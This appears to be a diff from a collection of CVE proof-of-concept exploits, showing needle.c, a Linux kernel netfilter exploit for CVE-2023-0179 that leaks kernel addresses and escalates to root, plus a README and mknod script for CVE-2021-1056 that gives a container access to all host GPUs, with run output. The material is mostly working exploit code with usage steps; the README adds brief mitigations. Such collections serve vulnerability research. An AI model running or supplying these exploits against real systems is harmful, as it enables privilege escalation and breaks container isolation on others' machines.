+void rule_add_dynset(struct nftnl_rule* r, char *set_name, uint32_t reg_key, uint32_t reg_data);
+void rule_add_lookup(struct nftnl_rule* r, char *set_name, uint32_t reg_key, uint32_t reg_data);
+void rule_add_immediate_data(struct nftnl_rule* r, uint32_t dreg, void* data, size_t data_len);
+void rule_add_immediate_verdict(struct nftnl_rule* r, uint32_t verdict, char* chain_name);
+
+int send_packet();
 unsigned long read_from_file(int line);
\ No newline at end of file
diff --git a/cve/linux-kernel/2023/CVE-2023-0179/needle.c b/cve/linux-kernel/2023/CVE-2023-0179/needle.c
index ddf91334..c1e77512 100644
--- a/cve/linux-kernel/2023/CVE-2023-0179/needle.c
+++ b/cve/linux-kernel/2023/CVE-2023-0179/needle.c
@@ -1,141 +1,141 @@
-#define _GNU_SOURCE 1
-#include <time.h>
-#include <string.h>
-#include <errno.h>
-#include <unistd.h>
-#include <linux/netfilter.h>
-#include <stdio.h>
-#include <sys/types.h>
-#include <sys/socket.h>
-#include <stdlib.h>
-#include <libmnl/libmnl.h>
-#include <libnftnl/table.h>
-#include <libnftnl/chain.h>
-#include <libnftnl/set.h>
-#include <libnftnl/rule.h>
-#include <libnftnl/expr.h>
-#include <limits.h>
-#include <sched.h>
-
-#include "helpers.h"
-#include "exploit.h"
-
-int main(int argc, char** argv, char** envp)
-{
-    // Use unique thread stack
-    cpu_set_t set;
-    CPU_ZERO(&set);
-    CPU_SET(0, &set);
-    sched_setaffinity(getpid(), sizeof(cpu_set_t), &set);
-    
-    enum mode choice;
-    
-    // cool trick from https://github.com/pqlx/CVE-2022-1015/blob/master/pwn.c
-    if (argc < 2) {
-        puts("[+] Dropping into network namespace");
-    
-        char* new_argv[] = {
-            "/usr/bin/unshare",
-            "-Urn",
-            argv[0],
-            "EXPLOIT",
-            NULL
-        };
-
-        execve(new_argv[0], new_argv, envp);
-        puts("Couldn't start unshare wrapper..");
-        puts("Recompile the exploit with an appropriate unshare path.");
-        exit(EXIT_FAILURE);
-    }
-    if (strcmp("EXPLOIT", argv[1])) {
-        puts("[-] Something went wrong...");
-        exit(EXIT_FAILURE);
-    }
-    
-    puts("Choose an option:");
-    puts("  1. Leak kernel TEXT address and regs address");
-    puts("  2. Run the exploit");
-    
-    scanf("%d",  (int *) &choice);
-
-    char *table_name = "mytable", 
-         *base_chain_name = "base_chain",
-         *exploit_chain_name = "exploit_chain",
-         *set_name = "myset12",
-         *dev_name = "eth0";
-
-    puts("[+] Setting up the network namespace environment");
-    system("./setup.sh");
-
-    struct mnl_socket* nl = mnl_socket_open(NETLINK_NETFILTER);
-    if (mnl_socket_bind(nl, 0, MNL_SOCKET_AUTOPID) < 0) {
-        perror("[-] mnl_socket_bind");
-        puts("[-] Check your CAP_NET_ADMIN capability");
-        exit(EXIT_FAILURE);
-    }
-
-    // Wait for local traffic to cool down
-    sleep(5);
-    
-    int seq = time(NULL);
-    if (create_table(nl, table_name, NFPROTO_NETDEV, &seq, NULL) == -1) {
-        perror("[-] Failed creating table");
-        exit(EXIT_FAILURE);
-    }
-    printf("[+] Created table %s\n", table_name);
-
-    struct unft_base_chain_param bp;
-    // NF_INET_PRE_ROUTING and NF_BR_LOCAL_IN shoud also work
-    bp.hook_num = NF_NETDEV_INGRESS;
-    bp.prio = INT_MIN;
-    if (create_chain(nl, table_name, base_chain_name, dev_name, NFPROTO_NETDEV, &bp, &seq, NULL)) {
-        perror("[-] Failed creating base chain");
-        exit(EXIT_FAILURE);
-    }
-    printf("[+] Created base chain %s\n", base_chain_name);
-
-    if (create_chain(nl, table_name, exploit_chain_name, dev_name, NFPROTO_NETDEV, NULL, &seq, NULL)) {
-        perror("[-] Failed creating exploit chain");
-        exit(EXIT_FAILURE);
-    }
-    printf("[+] Created exploit chain %s\n", base_chain_name);
-
-    if (create_set(nl, table_name, set_name, NFPROTO_NETDEV, &seq, NULL)) {
-        perror("[-] Failed creating set");
-        exit(EXIT_FAILURE);
-    }
-    printf("[+] Created exploit set\n");
-    
-    if (create_base_chain_rule_leak(nl, table_name, base_chain_name, NFPROTO_NETDEV, NULL, &seq)) {
-        perror("[-] Failed creating base chain rule");
-        exit(EXIT_FAILURE);
-    }
-    printf("[+] Created base chain rule\n");
-
-    uint8_t offset = 19, len = 4, vlan_hlen = 4;
-    uint8_t ethlen = len - offset + len - VLAN_ETH_HLEN + vlan_hlen;
-    unsigned long found_addr;
-    unsigned long found_instr;
-    if (create_exploit_chain_rule_leak(nl, table_name, exploit_chain_name, NFPROTO_NETDEV, NULL, &seq, offset, len)) {
-        perror("[-] Failed creating base chain rule");
-        return EXIT_FAILURE;
-    }
-    printf("[+] offset: %hhu & len: %hhu & ethlen = %hhu\n", offset, len, ethlen);
-    puts("[+] Successfully created exploit chain rule!");
-    if (send_packet() == 0) {
-        system("nft list map netdev mytable myset12 | ./run.sh > reg.log");
-        found_addr = read_from_file(0);
-        found_instr = read_from_file(1);
-        printf("[+] Found regs address: 0x%lx\n", found_addr);
-        printf("[+] Found instr address: 0x%lx\n", found_instr);
-        printf("[+] KASLR slide: 0x%lx\n", found_instr - INSTR_BASE);
-        system("nft delete table netdev mytable");
-    }
-
-    if (choice == LEAK_AND_PWN) {
-        printf("[+] Inserting the needle into address 0x%lx\n", found_addr);
-        sleep(5);
-        return pwn(nl, found_addr, found_instr);
-    }
-    return EXIT_SUCCESS;
-}
+#define _GNU_SOURCE 1
+#include <time.h>
+#include <string.h>
+#include <errno.h>
+#include <unistd.h>
+#include <linux/netfilter.h>
+#include <stdio.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <stdlib.h>
+#include <libmnl/libmnl.h>
+#include <libnftnl/table.h>
+#include <libnftnl/chain.h>
+#include <libnftnl/set.h>
+#include <libnftnl/rule.h>
+#include <libnftnl/expr.h>
+#include <limits.h>
+#include <sched.h>
+
+#include "helpers.h"
+#include "exploit.h"
+
+int main(int argc, char** argv, char** envp)
+{
+    // Use unique thread stack
+    cpu_set_t set;
+    CPU_ZERO(&set);
+    CPU_SET(0, &set);
+    sched_setaffinity(getpid(), sizeof(cpu_set_t), &set);
+    
+    enum mode choice;
+    
+    // cool trick from https://github.com/pqlx/CVE-2022-1015/blob/master/pwn.c
+    if (argc < 2) {
+        puts("[+] Dropping into network namespace");
+    
+        char* new_argv[] = {
+            "/usr/bin/unshare",
+            "-Urn",
+            argv[0],
+            "EXPLOIT",
+            NULL
+        };
+
+        execve(new_argv[0], new_argv, envp);
+        puts("Couldn't start unshare wrapper..");
+        puts("Recompile the exploit with an appropriate unshare path.");
+        exit(EXIT_FAILURE);
+    }
+    if (strcmp("EXPLOIT", argv[1])) {
+        puts("[-] Something went wrong...");
+        exit(EXIT_FAILURE);
+    }
+    
+    puts("Choose an option:");
+    puts("  1. Leak kernel TEXT address and regs address");
+    puts("  2. Run the exploit");
+    
+    scanf("%d",  (int *) &choice);
+
+    char *table_name = "mytable", 
+         *base_chain_name = "base_chain",
+         *exploit_chain_name = "exploit_chain",
+         *set_name = "myset12",
+         *dev_name = "eth0";
+
+    puts("[+] Setting up the network namespace environment");
+    system("./setup.sh");
+
+    struct mnl_socket* nl = mnl_socket_open(NETLINK_NETFILTER);
+    if (mnl_socket_bind(nl, 0, MNL_SOCKET_AUTOPID) < 0) {
+        perror("[-] mnl_socket_bind");
+        puts("[-] Check your CAP_NET_ADMIN capability");
+        exit(EXIT_FAILURE);
+    }
+
+    // Wait for local traffic to cool down
+    sleep(5);
+    
+    int seq = time(NULL);
+    if (create_table(nl, table_name, NFPROTO_NETDEV, &seq, NULL) == -1) {
+        perror("[-] Failed creating table");
+        exit(EXIT_FAILURE);
+    }
+    printf("[+] Created table %s\n", table_name);
+
+    struct unft_base_chain_param bp;
+    // NF_INET_PRE_ROUTING and NF_BR_LOCAL_IN shoud also work
+    bp.hook_num = NF_NETDEV_INGRESS;
+    bp.prio = INT_MIN;
+    if (create_chain(nl, table_name, base_chain_name, dev_name, NFPROTO_NETDEV, &bp, &seq, NULL)) {
+        perror("[-] Failed creating base chain");
+        exit(EXIT_FAILURE);
+    }
+    printf("[+] Created base chain %s\n", base_chain_name);
+
+    if (create_chain(nl, table_name, exploit_chain_name, dev_name, NFPROTO_NETDEV, NULL, &seq, NULL)) {
+        perror("[-] Failed creating exploit chain");
+        exit(EXIT_FAILURE);
+    }
+    printf("[+] Created exploit chain %s\n", base_chain_name);
+
+    if (create_set(nl, table_name, set_name, NFPROTO_NETDEV, &seq, NULL)) {
+        perror("[-] Failed creating set");
+        exit(EXIT_FAILURE);
+    }
+    printf("[+] Created exploit set\n");
+    
+    if (create_base_chain_rule_leak(nl, table_name, base_chain_name, NFPROTO_NETDEV, NULL, &seq)) {
+        perror("[-] Failed creating base chain rule");
+        exit(EXIT_FAILURE);
+    }
+    printf("[+] Created base chain rule\n");
+
+    uint8_t offset = 19, len = 4, vlan_hlen = 4;
+    uint8_t ethlen = len - offset + len - VLAN_ETH_HLEN + vlan_hlen;
+    unsigned long found_addr;
+    unsigned long found_instr;
+    if (create_exploit_chain_rule_leak(nl, table_name, exploit_chain_name, NFPROTO_NETDEV, NULL, &seq, offset, len)) {
+        perror("[-] Failed creating base chain rule");
+        return EXIT_FAILURE;
+    }
+    printf("[+] offset: %hhu & len: %hhu & ethlen = %hhu\n", offset, len, ethlen);
+    puts("[+] Successfully created exploit chain rule!");
+    if (send_packet() == 0) {
+        system("nft list map netdev mytable myset12 | ./run.sh > reg.log");
+        found_addr = read_from_file(0);
+        found_instr = read_from_file(1);
+        printf("[+] Found regs address: 0x%lx\n", found_addr);
+        printf("[+] Found instr address: 0x%lx\n", found_instr);
+        printf("[+] KASLR slide: 0x%lx\n", found_instr - INSTR_BASE);
+        system("nft delete table netdev mytable");
+    }
+
+    if (choice == LEAK_AND_PWN) {
+        printf("[+] Inserting the needle into address 0x%lx\n", found_addr);
+        sleep(5);
+        return pwn(nl, found_addr, found_instr);
+    }
+    return EXIT_SUCCESS;
+}
diff --git a/cve/linux-kernel/2023/yaml/CVE-2023-0179.yaml b/cve/linux-kernel/2023/yaml/CVE-2023-0179.yaml
index 74ca113b..df173263 100644
--- a/cve/linux-kernel/2023/yaml/CVE-2023-0179.yaml
+++ b/cve/linux-kernel/2023/yaml/CVE-2023-0179.yaml
@@ -1,23 +1,23 @@
-id: CVE-2023-0179
-source: https://github.com/TurtleARM/CVE-2023-0179-PoC
-info:
-  name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
-  severity: high
-  description: |
-    在 Linux 内核的 Netfilter 子系统中发现一个缓冲区溢出漏洞。此问题可能允许堆栈和堆地址泄漏，并可能允许通过任意代码执行将本地权限提升给根用户。
-  scope-of-influence:
-    Red Hat Enterprise Linux 9
-  reference:
-    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0179
-    - https://www.openwall.com/lists/oss-security/2023/01/13/2
-    - https://patchwork.ozlabs.org/project/netfilter-devel/patch/20230111212251.193032-4-pablo@netfilter.org/
-    - https://ubuntu.com/security/notices/USN-5856-1
-    - https://ubuntu.com/security/notices/USN-5857-1
-    - https://ubuntu.com/security/notices/USN-5858-1
-    - https://ubuntu.com/security/notices/USN-5859-1
-  classification:
-    cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
-    cvss-score: 7.8
-    cve-id: CVE-2023-0179
-    cnvd-id: NONE
+id: CVE-2023-0179
+source: https://github.com/TurtleARM/CVE-2023-0179-PoC
+info:
+  name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
+  severity: high
+  description: |
+    在 Linux 内核的 Netfilter 子系统中发现一个缓冲区溢出漏洞。此问题可能允许堆栈和堆地址泄漏，并可能允许通过任意代码执行将本地权限提升给根用户。
+  scope-of-influence:
+    Red Hat Enterprise Linux 9
+  reference:
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0179
+    - https://www.openwall.com/lists/oss-security/2023/01/13/2
+    - https://patchwork.ozlabs.org/project/netfilter-devel/patch/20230111212251.193032-4-pablo@netfilter.org/
+    - https://ubuntu.com/security/notices/USN-5856-1
+    - https://ubuntu.com/security/notices/USN-5857-1
+    - https://ubuntu.com/security/notices/USN-5858-1
+    - https://ubuntu.com/security/notices/USN-5859-1
+  classification:
+    cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 7.8
+    cve-id: CVE-2023-0179
+    cnvd-id: NONE
   tags: 缓冲区溢出，cve2023
\ No newline at end of file
diff --git a/cve/nvidia/2021/CVE-2021-1056/README.md b/cve/nvidia/2021/CVE-2021-1056/README.md
index ca9ccc4a..4e50d6c2 100644
--- a/cve/nvidia/2021/CVE-2021-1056/README.md
+++ b/cve/nvidia/2021/CVE-2021-1056/README.md
@@ -1,163 +1,163 @@
-# CVE-2021-1056
-
-NVIDIA GPU Display Driver for Linux, all versions, contains a vulnerability in the kernel mode layer (nvidia.ko) in which it does not completely honor operating system file system permissions to provide GPU device-level isolation, which may lead to denial of service or information disclosure.
-
-Here demonstrates the vulnerability on GPU containers created by [nvidia-container-runtime](https://github.com/NVIDIA/nvidia-container-runtime). For a comprehensive understanding, check out the accompanying [official post](https://ubuntu.com/security/CVE-2021-1056) for in-depth details.
-
-## How it works
-
-By creating specific character device files an attacker in a GPU container(container created by `nvidia-container-runtime`) is able to get access to all GPU devices on the host. 
-
-It also works on GPU pod created by `k8s-device-plugin` on kubernetes cluster.
-
-
-
-## Prerequisite
-
-* Docker 19.03
-* `nvidia-container-toolkit`
-
-* NVIDIA Driver 418.87.01 / 450.51.05
-* NVIDIA GPU Tesla V100 / TITAN V / Tesla K80
-
-NOTE: refer to [NVIDIA Security Bulletin](https://nvidia.custhelp.com/app/answers/detail/a_id/5142),  this vulnerability works on all GeForce, NVIDIA RTX/Quadro, NVS and Tesla series GPU, and all version drivers.
-
-
-
-## Usage
-
-* start a container with only 1 GPU card and mount 
-
-```bash
-$ docker run --gpus 1 -v $PWD:/CVE-2021-1056 -it tensorflow/tensorflow:1.13.2-gpu bash
-```
-
-
-
-* check gpu status **in container**
-
-```bash
-# nvidia-smi
-Sat Jan  9 07:21:03 2021       
-+-----------------------------------------------------------------------------+
-| NVIDIA-SMI 450.51.05    Driver Version: 450.51.05    CUDA Version: 11.0     |
-|-------------------------------+----------------------+----------------------+
-| GPU  Name        Persistence-M| Bus-Id        Disp.A | Volatile Uncorr. ECC |
-| Fan  Temp  Perf  Pwr:Usage/Cap|         Memory-Usage | GPU-Util  Compute M. |
-|                               |                      |               MIG M. |
-|===============================+======================+======================|
-|   0  Tesla V100-PCIE...  Off  | 00000000:02:00.0 Off |                    0 |
-| N/A   27C    P0    23W / 250W |      0MiB / 32510MiB |      0%      Default |
-|                               |                      |                  N/A |
-+-------------------------------+----------------------+----------------------+
-                                                                               
-+-----------------------------------------------------------------------------+
-| Processes:                                                                  |
-|  GPU   GI   CI        PID   Type   Process name                  GPU Memory |
-|        ID   ID                                                   Usage      |
-|=============================================================================|
-|  No running processes found                                                 |
-+-----------------------------------------------------------------------------+
-```
-
-
-
-* execute script **in container**
-
-```bash
-# bash /CVE-2021-1056/main.sh
-[INFO] init GPU num: 1
-[DEBUG] /dev/nvidia0 exists, skip
-[DEBUG] successfully get /dev/nvidia1
-[DEBUG] successfully get /dev/nvidia2
-[DEBUG] successfully get /dev/nvidia3
-[DEBUG] delete redundant /dev/nvidia4
-[INFO] get extra 3 GPU devices from host
-[INFO] current GPU num: 4
-[INFO] exec nvidia-smi:
-Sat Jan  9 07:22:43 2021       
-+-----------------------------------------------------------------------------+
-| NVIDIA-SMI 450.51.05    Driver Version: 450.51.05    CUDA Version: 11.0     |
-|-------------------------------+----------------------+----------------------+
-| GPU  Name        Persistence-M| Bus-Id        Disp.A | Volatile Uncorr. ECC |
-| Fan  Temp  Perf  Pwr:Usage/Cap|         Memory-Usage | GPU-Util  Compute M. |
-|                               |                      |               MIG M. |
-|===============================+======================+======================|
-|   0  Tesla V100-PCIE...  Off  | 00000000:02:00.0 Off |                    0 |
-| N/A   27C    P0    23W / 250W |      0MiB / 32510MiB |      0%      Default |
-|                               |                      |                  N/A |
-+-------------------------------+----------------------+----------------------+
-|   1  Tesla V100-PCIE...  Off  | 00000000:03:00.0 Off |                    0 |
-| N/A   30C    P0    25W / 250W |      0MiB / 32510MiB |      0%      Default |
-|                               |                      |                  N/A |
-+-------------------------------+----------------------+----------------------+
-|   2  Tesla V100-PCIE...  Off  | 00000000:82:00.0 Off |                    0 |
-| N/A   29C    P0    25W / 250W |      0MiB / 32510MiB |      0%      Default |
-|                               |                      |                  N/A |
-+-------------------------------+----------------------+----------------------+
-|   3  Tesla V100-PCIE...  Off  | 00000000:83:00.0 Off |                    0 |
-| N/A   28C    P0    25W / 250W |      0MiB / 32510MiB |      0%      Default |
-|                               |                      |                  N/A |
-+-------------------------------+----------------------+----------------------+
-                                                                               
-+-----------------------------------------------------------------------------+
-| Processes:                                                                  |
-|  GPU   GI   CI        PID   Type   Process name                  GPU Memory |
-|        ID   ID                                                   Usage      |
-|=============================================================================|
-|  No running processes found                                                 |
-+-----------------------------------------------------------------------------+
-```
-
-
-
-* run a tensorflow demo **in container** to ensure all the GPUs can indeed be accessed 
-
-```bash
-# nohup python /CVE-2021-1056/tf_distr_demo.py > log 2>&1 &
-# nvidia-smi
-Sat Jan  9 18:58:23 2021       
-+-----------------------------------------------------------------------------+
-| NVIDIA-SMI 450.51.05    Driver Version: 450.51.05    CUDA Version: 11.0     |
-|-------------------------------+----------------------+----------------------+
-| GPU  Name        Persistence-M| Bus-Id        Disp.A | Volatile Uncorr. ECC |
-| Fan  Temp  Perf  Pwr:Usage/Cap|         Memory-Usage | GPU-Util  Compute M. |
-|                               |                      |               MIG M. |
-|===============================+======================+======================|
-|   0  Tesla V100-PCIE...  Off  | 00000000:02:00.0 Off |                    0 |
-| N/A   32C    P0    36W / 250W |  31117MiB / 32510MiB |      1%      Default |
-|                               |                      |                  N/A |
-+-------------------------------+----------------------+----------------------+
-|   1  Tesla V100-PCIE...  Off  | 00000000:03:00.0 Off |                    0 |
-| N/A   33C    P0    35W / 250W |  31117MiB / 32510MiB |      1%      Default |
-|                               |                      |                  N/A |
-+-------------------------------+----------------------+----------------------+
-|   2  Tesla V100-PCIE...  Off  | 00000000:82:00.0 Off |                    0 |
-| N/A   33C    P0    36W / 250W |  31117MiB / 32510MiB |      1%      Default |
-|                               |                      |                  N/A |
-+-------------------------------+----------------------+----------------------+
-|   3  Tesla V100-PCIE...  Off  | 00000000:83:00.0 Off |                    0 |
-| N/A   32C    P0    37W / 250W |  31117MiB / 32510MiB |      1%      Default |
-|                               |                      |                  N/A |
-+-------------------------------+----------------------+----------------------+
-                                                                               
-+-----------------------------------------------------------------------------+
-| Processes:                                                                  |
-|  GPU   GI   CI        PID   Type   Process name                  GPU Memory |
-|        ID   ID                                                   Usage      |
-|=============================================================================|
-+-----------------------------------------------------------------------------+
-```
-
-
-
-## How to prevent
-
-Recommended
-
-* Refer to the [NVIDIA Security Bulletin](https://nvidia.custhelp.com/app/answers/detail/a_id/5142) or  to update the NVIDIA GPU driver
-
-Or
-
-* Add arg `--cap-drop MKNOD` to the  `docker run` to forbid the `mknod` in containers
+# CVE-2021-1056
+
+NVIDIA GPU Display Driver for Linux, all versions, contains a vulnerability in the kernel mode layer (nvidia.ko) in which it does not completely honor operating system file system permissions to provide GPU device-level isolation, which may lead to denial of service or information disclosure.
+
+Here demonstrates the vulnerability on GPU containers created by [nvidia-container-runtime](https://github.com/NVIDIA/nvidia-container-runtime). For a comprehensive understanding, check out the accompanying [official post](https://ubuntu.com/security/CVE-2021-1056) for in-depth details.
+
+## How it works
+
+By creating specific character device files an attacker in a GPU container(container created by `nvidia-container-runtime`) is able to get access to all GPU devices on the host. 
+
+It also works on GPU pod created by `k8s-device-plugin` on kubernetes cluster.
+
+
+
+## Prerequisite
+
+* Docker 19.03
+* `nvidia-container-toolkit`
+
+* NVIDIA Driver 418.87.01 / 450.51.05
+* NVIDIA GPU Tesla V100 / TITAN V / Tesla K80
+
+NOTE: refer to [NVIDIA Security Bulletin](https://nvidia.custhelp.com/app/answers/detail/a_id/5142),  this vulnerability works on all GeForce, NVIDIA RTX/Quadro, NVS and Tesla series GPU, and all version drivers.
+
+
+
+## Usage
+
+* start a container with only 1 GPU card and mount 
+
+```bash
+$ docker run --gpus 1 -v $PWD:/CVE-2021-1056 -it tensorflow/tensorflow:1.13.2-gpu bash
+```
+
+
+
+* check gpu status **in container**
+
+```bash
+# nvidia-smi
+Sat Jan  9 07:21:03 2021       
++-----------------------------------------------------------------------------+
+| NVIDIA-SMI 450.51.05    Driver Version: 450.51.05    CUDA Version: 11.0     |
+|-------------------------------+----------------------+----------------------+
+| GPU  Name        Persistence-M| Bus-Id        Disp.A | Volatile Uncorr. ECC |
+| Fan  Temp  Perf  Pwr:Usage/Cap|         Memory-Usage | GPU-Util  Compute M. |
+|                               |                      |               MIG M. |
+|===============================+======================+======================|
+|   0  Tesla V100-PCIE...  Off  | 00000000:02:00.0 Off |                    0 |
+| N/A   27C    P0    23W / 250W |      0MiB / 32510MiB |      0%      Default |
+|                               |                      |                  N/A |
++-------------------------------+----------------------+----------------------+
+                                                                               
++-----------------------------------------------------------------------------+
+| Processes:                                                                  |
+|  GPU   GI   CI        PID   Type   Process name                  GPU Memory |
+|        ID   ID                                                   Usage      |
+|=============================================================================|
+|  No running processes found                                                 |
++-----------------------------------------------------------------------------+
+```
+
+
+
+* execute script **in container**
+
+```bash
+# bash /CVE-2021-1056/main.sh
+[INFO] init GPU num: 1
+[DEBUG] /dev/nvidia0 exists, skip
+[DEBUG] successfully get /dev/nvidia1
+[DEBUG] successfully get /dev/nvidia2
+[DEBUG] successfully get /dev/nvidia3
+[DEBUG] delete redundant /dev/nvidia4
+[INFO] get extra 3 GPU devices from host
+[INFO] current GPU num: 4
+[INFO] exec nvidia-smi:
+Sat Jan  9 07:22:43 2021       
++-----------------------------------------------------------------------------+
+| NVIDIA-SMI 450.51.05    Driver Version: 450.51.05    CUDA Version: 11.0     |
+|-------------------------------+----------------------+----------------------+
+| GPU  Name        Persistence-M| Bus-Id        Disp.A | Volatile Uncorr. ECC |
+| Fan  Temp  Perf  Pwr:Usage/Cap|         Memory-Usage | GPU-Util  Compute M. |
+|                               |                      |               MIG M. |
+|===============================+======================+======================|
+|   0  Tesla V100-PCIE...  Off  | 00000000:02:00.0 Off |                    0 |
+| N/A   27C    P0    23W / 250W |      0MiB / 32510MiB |      0%      Default |
+|                               |                      |                  N/A |
++-------------------------------+----------------------+----------------------+
+|   1  Tesla V100-PCIE...  Off  | 00000000:03:00.0 Off |                    0 |
+| N/A   30C    P0    25W / 250W |      0MiB / 32510MiB |      0%      Default |
+|                               |                      |                  N/A |
++-------------------------------+----------------------+----------------------+
+|   2  Tesla V100-PCIE...  Off  | 00000000:82:00.0 Off |                    0 |
+| N/A   29C    P0    25W / 250W |      0MiB / 32510MiB |      0%      Default |
+|                               |                      |                  N/A |
++-------------------------------+----------------------+----------------------+
+|   3  Tesla V100-PCIE...  Off  | 00000000:83:00.0 Off |                    0 |
+| N/A   28C    P0    25W / 250W |      0MiB / 32510MiB |      0%      Default |
+|                               |                      |                  N/A |
++-------------------------------+----------------------+----------------------+
+                                                                               
++-----------------------------------------------------------------------------+
+| Processes:                                                                  |
+|  GPU   GI   CI        PID   Type   Process name                  GPU Memory |
+|        ID   ID                                                   Usage      |
+|=============================================================================|
+|  No running processes found                                                 |
++-----------------------------------------------------------------------------+
+```
+
+
+
+* run a tensorflow demo **in container** to ensure all the GPUs can indeed be accessed 
+
+```bash
+# nohup python /CVE-2021-1056/tf_distr_demo.py > log 2>&1 &
+# nvidia-smi
+Sat Jan  9 18:58:23 2021       
++-----------------------------------------------------------------------------+
+| NVIDIA-SMI 450.51.05    Driver Version: 450.51.05    CUDA Version: 11.0     |
+|-------------------------------+----------------------+----------------------+
+| GPU  Name        Persistence-M| Bus-Id        Disp.A | Volatile Uncorr. ECC |
+| Fan  Temp  Perf  Pwr:Usage/Cap|         Memory-Usage | GPU-Util  Compute M. |
+|                               |                      |               MIG M. |
+|===============================+======================+======================|
+|   0  Tesla V100-PCIE...  Off  | 00000000:02:00.0 Off |                    0 |
+| N/A   32C    P0    36W / 250W |  31117MiB / 32510MiB |      1%      Default |
+|                               |                      |                  N/A |
++-------------------------------+----------------------+----------------------+
+|   1  Tesla V100-PCIE...  Off  | 00000000:03:00.0 Off |                    0 |
+| N/A   33C    P0    35W / 250W |  31117MiB / 32510MiB |      1%      Default |
+|                               |                      |                  N/A |
++-------------------------------+----------------------+----------------------+
+|   2  Tesla V100-PCIE...  Off  | 00000000:82:00.0 Off |                    0 |
+| N/A   33C    P0    36W / 250W |  31117MiB / 32510MiB |      1%      Default |
+|                               |                      |                  N/A |
++-------------------------------+----------------------+----------------------+
+|   3  Tesla V100-PCIE...  Off  | 00000000:83:00.0 Off |                    0 |
+| N/A   32C    P0    37W / 250W |  31117MiB / 32510MiB |      1%      Default |
+|                               |                      |                  N/A |
++-------------------------------+----------------------+----------------------+
+                                                                               
++-----------------------------------------------------------------------------+
+| Processes:                                                                  |
+|  GPU   GI   CI        PID   Type   Process name                  GPU Memory |
+|        ID   ID                                                   Usage      |
+|=============================================================================|
++-----------------------------------------------------------------------------+
+```
+
+
+
+## How to prevent
+
+Recommended
+
+* Refer to the [NVIDIA Security Bulletin](https://nvidia.custhelp.com/app/answers/detail/a_id/5142) or  to update the NVIDIA GPU driver
+
+Or
+
+* Add arg `--cap-drop MKNOD` to the  `docker run` to forbid the `mknod` in containers
 * Enable `security context`  in kubernetes clusters when creating a pod
\ No newline at end of file
diff --git a/cve/nvidia/2021/CVE-2021-1056/main.sh b/cve/nvidia/2021/CVE-2021-1056/main.sh
index 504871b7..24bb7a24 100644
--- a/cve/nvidia/2021/CVE-2021-1056/main.sh
+++ b/cve/nvidia/2021/CVE-2021-1056/main.sh
@@ -1,42 +1,42 @@
-#!/usr/bin/env bash
-
-ROOT=$(cd $(dirname ${BASH_SOURCE[0]}) && pwd -P)
-source "${ROOT}/util.sh"
-
-INIT_GPU_NUM=$(util::get_gpu_num)
-util::log_info "init GPU num: $INIT_GPU_NUM"
-
-# get major number and minor number from a legal GPU
-DEV=/dev/$(ls /dev | grep nvidia[0-9] | head -n 1)
-DEV_NUMBER=$(printf "%d %d" $(stat --format "0x%t 0x%T" $DEV))
-
-GPU_NO=0
-while :
-do
-    # skip this no if device file already exists
-    if [ -c "/dev/nvidia$GPU_NO" ]; then
-        util::log_debug "/dev/nvidia$GPU_NO exists, skip"
-        GPU_NO=`expr $GPU_NO + 1`
-        continue
-    fi
-
-    CURRENT_GPU_NUM=$(util::get_gpu_num)
-
-    # create specify device file to trick cgroup
-    mknod -m 666 /dev/nvidia$GPU_NO c $DEV_NUMBER
-    
-    # break if have got all GPUs on the host
-    if [ $(util::get_gpu_num) == "$CURRENT_GPU_NUM" ]; then
-        util::log_debug "delete redundant /dev/nvidia$GPU_NO"
-        rm /dev/nvidia$GPU_NO
-        break
-    fi
-
-    util::log_debug "successfully get /dev/nvidia$GPU_NO"
-    GPU_NO=`expr $GPU_NO + 1`
-done
-
-util::log_info "get extra $(expr $CURRENT_GPU_NUM - $INIT_GPU_NUM) GPU devices from host"
-util::log_info "current GPU num: $CURRENT_GPU_NUM"
-util::log_info "exec nvidia-smi:"
+#!/usr/bin/env bash
+
+ROOT=$(cd $(dirname ${BASH_SOURCE[0]}) && pwd -P)
+source "${ROOT}/util.sh"
+
+INIT_GPU_NUM=$(util::get_gpu_num)
+util::log_info "init GPU num: $INIT_GPU_NUM"
+
+# get major number and minor number from a legal GPU
+DEV=/dev/$(ls /dev | grep nvidia[0-9] | head -n 1)
+DEV_NUMBER=$(printf "%d %d" $(stat --format "0x%t 0x%T" $DEV))
+
+GPU_NO=0
+while :
+do
+    # skip this no if device file already exists
+    if [ -c "/dev/nvidia$GPU_NO" ]; then
+        util::log_debug "/dev/nvidia$GPU_NO exists, skip"
+        GPU_NO=`expr $GPU_NO + 1`
+        continue
+    fi
+
+    CURRENT_GPU_NUM=$(util::get_gpu_num)
+
+    # create specify device file to trick cgroup
+    mknod -m 666 /dev/nvidia$GPU_NO c $DEV_NUMBER
+    
+    # break if have got all GPUs on the host
+    if [ $(util::get_gpu_num) == "$CURRENT_GPU_NUM" ]; then
+        util::log_debug "delete redundant /dev/nvidia$GPU_NO"
+        rm /dev/nvidia$GPU_NO
+        break
+    fi
+
+    util::log_debug "successfully get /dev/nvidia$GPU_NO"
+    GPU_NO=`expr $GPU_NO + 1`
+done
+
+util::log_info "get extra $(expr $CURRENT_GPU_NUM - $INIT_GPU_NUM) GPU devices from host"
+util::log_info "current GPU num: $CURRENT_GPU_NUM"
+util::log_info "exec nvidia-smi:"
 nvidia-smi
\ No newline at end of file
diff --git a/cve/nvidia/2021/CVE-2021-1056/tf_distr_demo.py b/cve/nvidia/2021/CVE-2021-1056/tf_distr_demo.py
index e662da34..040afbf5 100644
--- a/cve/nvidia/2021/CVE-2021-1056/tf_distr_demo.py
+++ b/cve/nvidia/2021/CVE-2021-1056/tf_distr_demo.py
@@ -1,106 +1,106 @@
-# coding=utf-8
-from tensorflow.examples.tutorials.mnist import input_data
-from tensorflow.python.client import device_lib
-
-mnist = input_data.read_data_sets("/tmp/data/", one_hot=True)
-
-import tensorflow as tf
-
-learning_rate = 0.001
-training_steps = 8250
-batch_size = 100
-display_step = 100
-
-n_hidden_1 = 256
-n_hidden_2 = 256
-n_input = 784
-n_classes = 10
-
-def _variable_on_cpu(name, shape, initializer):
-    with tf.device('/cpu:0'):
-        dtype = tf.float32
